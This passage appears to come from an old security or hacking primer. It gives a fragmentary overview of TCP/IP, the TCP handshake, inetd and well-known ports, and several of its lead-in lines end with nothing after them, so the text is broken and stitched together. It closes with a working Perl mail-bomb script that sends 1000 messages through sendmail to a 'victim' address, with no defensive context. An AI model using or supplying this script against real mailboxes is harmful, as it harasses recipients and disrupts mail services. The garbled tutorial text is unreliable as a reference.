These principles have not only been proven faulty, but they also go against the original concepts of how security could evolve through discussion and open education.
The Jargon File defines:
Some major security sites for information and tools:
TCP/IP refers to a collection of protocols that facilitate communication between machines over the Internet (or other networks running TCP/IP).
Protocols within the TCP/IP suite work together to provide data transport on the Internet.
There are two classes of protocols within the TCP/IP suite:
TCP/IP operates through the use
of a protocol stack, broken into layers:
The IP datagram:
The TCP system relies on a virtual circuit that is established between the requesting machine and its target. This circuit is opened via three-part handshake:
As each connection request is received, inetd starts an application server program. To facilitate this process, each application (FTP or Telnet, for example) is assigned a unique address. This address is called a port.
There are thousands of ports on the average Internet server. For purposes of convenience and efficiency, a standard framework has been developed for port assignment. These are commonly referred to as well-known ports:
#!/bin/perl $mailprog = `/usr/lib/sendmail'; $recipient = `victim@targeted_site.com'; $loop_cnt = 0; while ($loop_cnt < 1000) { open (MAIL, "|$mailprog $recipient") || die "Can't open $mailprog!\n"; print MAIL "You are very bad!"; close(MAIL); sleep 3; $loop_cnt++; }